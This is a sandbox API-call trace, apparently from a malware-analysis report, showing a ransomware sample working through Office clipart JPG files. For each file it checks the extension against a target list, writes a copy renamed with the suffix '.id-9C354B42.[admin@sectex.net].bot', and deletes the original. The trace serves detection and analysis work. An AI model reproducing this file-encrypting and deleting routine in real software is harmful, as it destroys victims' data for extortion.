	[0163.227] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.227] lstrlenW (lpString=".rar") returned 4
	[0163.227] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.227] lstrlenW (lpString=".bz2") returned 4
	[0163.227] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.227] lstrlenW (lpString=".7z") returned 3
	[0163.227] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.227] lstrlenW (lpString=".dbf") returned 4
	[0163.227] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.227] lstrlenW (lpString=".1cd") returned 4
	[0163.227] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 63
	[0163.227] lstrlenW (lpString=".jpg") returned 4
	[0163.227] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.227] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.227] lstrlenW (lpString="J0145272.JPG") returned 12
	[0163.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.228] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=49238) returned 1
	[0163.228] CloseHandle (hObject=0x3c4) returned 1
	[0163.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg")) returned 0x20
	[0163.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.228] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.228] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.229] GetLastError () returned 0x0
	[0163.229] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xc056, lpOverlapped=0x0) returned 1
	[0163.232] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xc060, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xc060, lpOverlapped=0x0) returned 1
	[0163.234] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.234] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.234] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.234] CloseHandle (hObject=0x1d8) returned 1
	[0163.234] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.234] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.237] CloseHandle (hObject=0x3c4) returned 1
	[0163.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.237] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg")) returned 1
	[0163.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.238] lstrlenW (lpString=".doc") returned 4
	[0163.238] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.238] lstrlenW (lpString=".docx") returned 5
	[0163.238] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0163.238] lstrlenW (lpString=".pdf") returned 4
	[0163.238] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.238] lstrlenW (lpString=".xls") returned 4
	[0163.238] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.238] lstrlenW (lpString=".xlsx") returned 5
	[0163.238] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0163.238] lstrlenW (lpString=".ppt") returned 4
	[0163.238] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.238] lstrlenW (lpString=".zip") returned 4
	[0163.238] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.238] lstrlenW (lpString=".rar") returned 4
	[0163.238] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.238] lstrlenW (lpString=".bz2") returned 4
	[0163.238] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.238] lstrlenW (lpString=".7z") returned 3
	[0163.238] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.238] lstrlenW (lpString=".dbf") returned 4
	[0163.238] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.238] lstrlenW (lpString=".1cd") returned 4
	[0163.238] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.238] lstrlenW (lpString=".jpg") returned 4
	[0163.238] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.239] lstrlenW (lpString=".doc") returned 4
	[0163.239] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.239] lstrlenW (lpString=".docx") returned 5
	[0163.239] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0163.239] lstrlenW (lpString=".pdf") returned 4
	[0163.239] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.239] lstrlenW (lpString=".xls") returned 4
	[0163.239] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.239] lstrlenW (lpString=".xlsx") returned 5
	[0163.239] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0163.239] lstrlenW (lpString=".ppt") returned 4
	[0163.239] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.239] lstrlenW (lpString=".zip") returned 4
	[0163.239] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.239] lstrlenW (lpString=".rar") returned 4
	[0163.239] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.239] lstrlenW (lpString=".bz2") returned 4
	[0163.239] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.239] lstrlenW (lpString=".7z") returned 3
	[0163.239] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.239] lstrlenW (lpString=".dbf") returned 4
	[0163.239] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.239] lstrlenW (lpString=".1cd") returned 4
	[0163.239] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 63
	[0163.239] lstrlenW (lpString=".jpg") returned 4
	[0163.239] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.239] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.240] lstrlenW (lpString="J0145361.JPG") returned 12
	[0163.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.240] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=21125) returned 1
	[0163.240] CloseHandle (hObject=0x3c4) returned 1
	[0163.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg")) returned 0x20
	[0163.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.241] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.241] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.241] GetLastError () returned 0x0
	[0163.241] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x5285, lpOverlapped=0x0) returned 1
	[0163.487] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5290, lpOverlapped=0x0) returned 1
	[0163.488] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.488] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.488] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.489] CloseHandle (hObject=0x1d8) returned 1
	[0163.489] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.489] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.491] CloseHandle (hObject=0x3c4) returned 1
	[0163.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg")) returned 1
	[0163.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.493] lstrlenW (lpString=".doc") returned 4
	[0163.493] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.493] lstrlenW (lpString=".docx") returned 5
	[0163.493] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1
	[0163.493] lstrlenW (lpString=".pdf") returned 4
	[0163.493] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.493] lstrlenW (lpString=".xls") returned 4
	[0163.493] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.493] lstrlenW (lpString=".xlsx") returned 5
	[0163.493] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1
	[0163.493] lstrlenW (lpString=".ppt") returned 4
	[0163.493] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.493] lstrlenW (lpString=".zip") returned 4
	[0163.493] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.494] lstrlenW (lpString=".rar") returned 4
	[0163.494] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.494] lstrlenW (lpString=".bz2") returned 4
	[0163.494] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.494] lstrlenW (lpString=".7z") returned 3
	[0163.494] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.494] lstrlenW (lpString=".dbf") returned 4
	[0163.494] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.494] lstrlenW (lpString=".1cd") returned 4
	[0163.494] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.494] lstrlenW (lpString=".jpg") returned 4
	[0163.494] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.494] lstrlenW (lpString=".doc") returned 4
	[0163.494] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.494] lstrlenW (lpString=".docx") returned 5
	[0163.494] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1
	[0163.494] lstrlenW (lpString=".pdf") returned 4
	[0163.494] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.494] lstrlenW (lpString=".xls") returned 4
	[0163.494] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.494] lstrlenW (lpString=".xlsx") returned 5
	[0163.494] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1
	[0163.494] lstrlenW (lpString=".ppt") returned 4
	[0163.494] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.494] lstrlenW (lpString=".zip") returned 4
	[0163.494] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.494] lstrlenW (lpString=".rar") returned 4
	[0163.494] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.494] lstrlenW (lpString=".bz2") returned 4
	[0163.495] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.495] lstrlenW (lpString=".7z") returned 3
	[0163.495] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.495] lstrlenW (lpString=".dbf") returned 4
	[0163.495] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.495] lstrlenW (lpString=".1cd") returned 4
	[0163.495] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 63
	[0163.495] lstrlenW (lpString=".jpg") returned 4
	[0163.495] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.495] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.495] lstrlenW (lpString="J0149018.JPG") returned 12
	[0163.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.692] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=27393) returned 1
	[0163.692] CloseHandle (hObject=0x25c) returned 1
	[0163.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg")) returned 0x20
	[0163.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.692] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.692] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.693] GetLastError () returned 0x0
	[0163.693] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x6b01, lpOverlapped=0x0) returned 1
	[0163.809] WriteFile (in: hFile=0x3f0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x6b10, lpOverlapped=0x0) returned 1
	[0163.810] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.811] WriteFile (in: hFile=0x3f0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.811] SetEndOfFile (hFile=0x3f0) returned 1
	[0163.811] CloseHandle (hObject=0x3f0) returned 1
	[0163.811] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.811] SetEndOfFile (hFile=0x25c) returned 1
	[0163.813] CloseHandle (hObject=0x25c) returned 1
	[0163.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg")) returned 1
	[0164.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.364] lstrlenW (lpString=".doc") returned 4
	[0164.364] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0164.383] lstrlenW (lpString=".docx") returned 5
	[0164.383] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0164.383] lstrlenW (lpString=".pdf") returned 4
	[0164.383] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0164.383] lstrlenW (lpString=".xls") returned 4
	[0164.383] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0164.383] lstrlenW (lpString=".xlsx") returned 5
	[0164.383] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0164.383] lstrlenW (lpString=".ppt") returned 4
	[0164.383] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0164.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.383] lstrlenW (lpString=".zip") returned 4
	[0164.383] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0164.384] lstrlenW (lpString=".rar") returned 4
	[0164.384] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0164.384] lstrlenW (lpString=".bz2") returned 4
	[0164.384] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0164.384] lstrlenW (lpString=".7z") returned 3
	[0164.384] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0164.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.384] lstrlenW (lpString=".dbf") returned 4
	[0164.384] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0164.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.384] lstrlenW (lpString=".1cd") returned 4
	[0164.384] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0164.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.384] lstrlenW (lpString=".jpg") returned 4
	[0164.384] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0164.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.384] lstrlenW (lpString=".doc") returned 4
	[0164.384] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0164.384] lstrlenW (lpString=".docx") returned 5
	[0164.384] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0164.384] lstrlenW (lpString=".pdf") returned 4
	[0164.384] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0164.384] lstrlenW (lpString=".xls") returned 4
	[0164.384] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0164.384] lstrlenW (lpString=".xlsx") returned 5
	[0164.384] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0164.384] lstrlenW (lpString=".ppt") returned 4
	[0164.385] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0164.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG") returned 63
	[0164.385] lstrlenW (lpString=".zip") returned 4
	[0164.385] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0164.385] lstrlenW (lpString=".rar") returned 4
	[0164.385] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0164.385] lstrlenW (lpString=".bz2") returned 4
	[0164.385] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0164.385] lstrlenW (lpString=".7z") returned 3
